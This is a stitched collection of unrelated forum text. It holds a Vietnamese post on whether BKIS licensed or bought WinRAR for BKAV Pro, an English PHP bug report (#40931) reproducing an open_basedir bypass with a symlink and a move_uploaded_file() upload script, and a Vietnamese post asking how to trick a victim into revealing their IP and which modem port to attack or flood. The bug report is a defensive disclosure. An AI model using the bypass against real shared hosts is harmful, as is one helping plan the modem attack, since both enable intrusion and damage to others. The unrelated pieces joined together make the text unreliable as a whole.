Theo như lời anh Quảng nói trên Vietnamnet BKIS đã mua bản quyền của WinRAR ( copyright ) chứ không phải mua giấy phép sử dụng ( lisence ) của WinRAR. 2 cái này hoàn toàn khác nhau, và cái giá để mua lại copyright lớn hơn rất nhiều so với giá mua lisence. như vậy đây sẽ là 1 thương vụ lớn của RARLab và chắc chắn rằng nhân viên của RARLab sẽ nhớ ngay tới cái tên BKIS, Vietnam khi có ai nhắc đến, nhưng qua nhưng email của các bạn trên diễn đàn gửi cho RARLab tôi thấy họ còn không biết BKIS là ai cho tới khi các bạn nhắc tới và họ nói sẽ *check it* Còn riêng tôi cũng đã gửi 1 email tới RARLab và cũng nhận được 1 reply nhưng hơi khác so với câu trả lời của RARLab với các bạn ở trên. Vấn đề kỹ thuật bây giờ đã quá sáng tỏ chúng ta có thể tạm gác lại chưa bàn tiếp, vấn đề bây giờ ta sẽ chờ xem động thái của RARLab, họ sẽ trả lời với mọi người rằng BKIS có được phép nhúng rar.exe và BKAV Pro hay không. Nên việc tranh luận tiếp theo tôi cảm thấy là thừa, các bạn cố gắng chờ đợi tránh lạm bàn sang hướng khác gây loãng chủ đề P/S : Tôi tin rằng ở đâu có trong các máy tính khách hàng của BKIS chắn chắn sẽ có những bản BKAV Pro có nhúng rar.exe trước "cái giữa năm 2007" của anh Quảng. 

@chinhtruc: http://img53.imageshack.us/my.php?image=bkavdp7.jpg Tự xem hướng dẫn rồi tự giải câu đố của bạn nhé! Bạn giải không được thì đi chửi BKIS ấy, đừng kiếm tôi!  

Bug #40931 open_basedir bypass via symlink and move_uploaded_file() Description: ------------ User can bypass open_basedir restriction by move_uploaded_file() if target file path is symlink to any directory. Reproduce code: --------------- user1 will upload file to user2's /home/user2/public_html folder. We have in /etc/passwd: user1:32001:32001::/home/user1:/bin/bash user2:32002:32002::/home/user2:/bin/bash Target folder allows to write for anybody: # ls -lA /home/user2 drwxrwxrwx 2 user2 user2 4096 Mar 27 17:31 public_html/ Apache have mod_php intalled. Apache config for user1: <VirtualHost xxx.xxx.xxx.xxx> ServerName user1.xxxxxxx.com DocumentRoot /home/user1/public_html User user1 php_admin_value open_basedir "/home/user1" </VirtualHost> User user1 can do something like: $ cd /home/user1/public_html/ $ ln -s /home/user2/public_html user2_public_html $ echo '<html><body> <? if ( isset($_FILES["userfile"]) ) { echo "Upload "; if (move_uploaded_file ($_FILES["userfile"]["tmp_name"],"/home/user1/public_html/user2_public_h tml/file.ext")) echo "ok"; else echo "failed"; } ?> <form name="uplform" method="post" action="<?=$PHP_SELF?>" enctype="multipart/form-data"> <input type="file" name="userfile"> <input type="submit"> </body></html>' > upload.php Expected result: ---------------- If we access http://user1.xxxxxxx.com/upload.php after file upload expected message "Upload failed" and no file /home/user2/public_html/file.ext in target folder. Actual result: -------------- If we access http://user1.xxxxxxx.com/upload.php after file upload we got message "Upload ok" and file /home/user2/public_html/file.ext well exist in target folder.  

Vậy là mình phải bảo nó "mày mở port 3306 và vào trang check ip , đưa IP của mày + user và pass đây cho tao phá" , đúng hok ta ;))........ chậc ....... =.=! , hok biết phải port 3306 ko nhỉ .... Em cũng thấy thắc mắc , nếu mình muốn tấn công vào modem của victim thì việc dụ nó để lấy IP nó trong thời gian đó ko khó , nhưng ví dụ như mình mún làm bốc khói modem victim thì phải fang vào port nào anh chị nhỉ :-?? À mà nếu mình tấn công vào thì modem nó có cháy ko ta , hay modem mình cháy trước , ý em nói là ddos đó . p/s: Em chỉ muốn biết thêm thôi chứ ko có ý phá hoại ai đâu , đừng nhìn em như thế :-S